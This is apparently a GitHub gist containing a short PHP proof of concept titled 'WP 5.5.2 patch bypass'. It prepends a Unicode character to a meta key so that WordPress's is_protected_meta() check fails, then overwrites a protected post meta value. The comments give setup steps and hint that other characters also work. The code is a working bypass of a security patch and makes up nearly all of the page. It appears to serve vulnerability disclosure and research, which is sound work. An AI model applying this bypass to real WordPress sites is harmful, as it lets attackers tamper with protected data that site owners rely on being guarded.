Skip to content

Instantly share code, notes, and snippets.

@Slavco

Slavco/protected-meta-not.php Secret

Created Oct 29, 2020
Embed
What would you like to do?
WP 5.5.2 patch bypass
<?php
//add into database protected meta called _protected-meta-new with value test for default post with id = 1
//enable hello.php plugin
//refresh and check DB :/
//Hint: isn't only this character
//Disclaimer: WP security team followed their approach and I labeled it as a wrong back in the time :/
function test_protected(){
$bypass_meta_key = json_decode('"\u'."05AA".'"')."_protected-meta-new";
if ( !is_protected_meta($bypass_meta_key) ){
update_metadata("post", 1, $bypass_meta_key, "doomed");
var_dump(get_metadata_raw("post", 1, "_protected-meta-new"));
exit();
}
}
add_action("init", "test_protected");
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment